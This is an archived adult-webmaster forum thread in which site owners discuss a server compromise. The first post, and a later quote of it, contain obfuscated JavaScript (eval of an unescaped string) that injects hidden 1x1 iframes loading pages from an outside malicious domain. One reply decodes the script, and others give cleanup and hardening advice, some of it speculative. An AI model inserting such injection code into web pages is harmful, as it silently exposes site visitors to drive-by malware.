GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   so those viruses on my tgp is back... any one else? (https://gfy.com/showthread.php?t=787142)

tehHinjew 11-24-2007 07:57 PM

so those viruses on my tgp is back... any one else?
 
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

hosted at webair, i have 0 scripts

any one else?:Oh crap

tehHinjew 11-24-2007 07:59 PM

http://www.google.ca/search?source=i...e+Search&meta=

justFred 11-24-2007 08:20 PM

Quote:

Originally Posted by tehHinjew (Post 13416273)

:eyecrazy:eek7:eek2

MoreMagic 11-25-2007 12:08 AM

Let me guess cpanel?

SmokeyTheBear 11-25-2007 01:01 AM

Quote:

Originally Posted by MoreMagic (Post 13416849)
Let me guess cpanel?

i doubt it , webair doesnt use cpanel by default i don't think

starpimps 11-25-2007 01:15 AM

thanks for the heads up...checked some sites
and i got the same code

files modified on nov19th =\

hjnet 11-25-2007 01:42 AM

Your server got hacked, a good idea would be to check your sites files for recently changed or newly added files, you can alos do that through FTP.

And through SSH you could take a look what recently happend on your server with the "last" command.

Oh and update your box :)

V_RocKs 11-25-2007 01:53 AM

Webair has problems....

Zester 11-25-2007 05:46 AM

use this encoder/decoder:
http://d21c.com/sookietex/ASCII2HEX.html

Zester 11-25-2007 05:48 AM

here is is decoded:
PHP Code:

documentwrite('<iframe s%7 2c=http://softspy% 64elete.com/strong /050/ width=1 he%6 9ght=1></iframe>'); 

I fucked it up a little but you get the picture...

Pornopat 11-25-2007 05:52 AM

Delete all php files from your server and then start cleaning up the mess with a code that represses.

Spudman 11-25-2007 05:53 AM

i had this problem, got rid of it recently and im still ok at the moment, im with webair too.

Scootermuze 11-25-2007 06:57 AM

I get them on ocassion...

I've cleaned up, changed passwords, removed all php, and still have them show up now and then...

The php I did use were just single file parser scripts..

Anyone know of a way to restrict ftp access to a given ip address?

directfiesta 11-25-2007 08:19 AM

Quote:

Originally Posted by Scootermuze (Post 13417461)

Anyone know of a way to restrict ftp access to a given ip address?

firewall

directfiesta 11-25-2007 08:20 AM

Quote:

Originally Posted by MoreMagic (Post 13416849)
Let me guess cpanel?

wrong ...... another guess?

Zester 11-25-2007 08:33 AM

what do you guys mean "remove all php files" ? how it this related to php?

Evil E 11-25-2007 08:38 AM

Are you on a dedicated box?

Evil E 11-25-2007 08:40 AM

http://64.233.167.104/search?q=cache...nk&cd=10&gl=ca

Evil E 11-25-2007 09:00 AM

I hope webair are looking into this problem with you, because there might be some weird/illegal activities going onright now...

http://www.honeynet.org.cn/downloads...etworks_EC.htm

hjnet 11-25-2007 09:17 AM

Quote:

Originally Posted by Scootermuze (Post 13417461)
I get them on ocassion...

I've cleaned up, changed passwords, removed all php, and still have them show up now and then...

The php I did use were just single file parser scripts..

Anyone know of a way to restrict ftp access to a given ip address?

I'd guess the person who did it used a proxy, but search google for "IPTables" or "hosts.deny"

Zester 11-25-2007 09:39 AM

bbbbbbbump

Sosa 11-25-2007 10:36 AM

that sucks for you

'So Fucking Money 12-14-2007 11:17 AM

Yeah, webair has been beginning to suck. Who is the webair replacement?

Adultnet 12-14-2007 11:20 AM

yeah not good.. good luck with resolving this...

sortie 12-14-2007 11:31 AM

Quote:

Originally Posted by tehHinjew (Post 13416268)
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%64%6c%2f%6e%65%77 %6e%65%77%2e%70%68%70%3f%61%64%76%3d%35%30%20%77%6 9%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c% 2f%69%66%72%61%6d%65%3e%27%29%3b'));</script>

hosted at webair, i have 0 scripts

any one else?:Oh crap

You should ask them if they have the lastest version of SSH installed on their servers. There is a version of SSH that could be flooded and allow a hacker to login to the server. This was fixed, but if a web host is still using the old version then the problem is there.

Wiredoctor 12-14-2007 06:24 PM

Once your server get compromised like this the only 100% fail safe way to get it back is to format it, and make sure your host knows how to firewall it this time. This should never or very rarely happen if the server is being managed properly.:2 cents:

Evil E 12-14-2007 06:56 PM

If still not fixed, you have to check which scripts you run on your server and if any of those scripts versions are vulnerable to known exploits.

The Judge 12-14-2007 07:36 PM

But does your antivirus detect it when you load your page? If not then it is something way more evil (undetectable Russian rootkit)


All times are GMT -7. The time now is 10:18 AM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123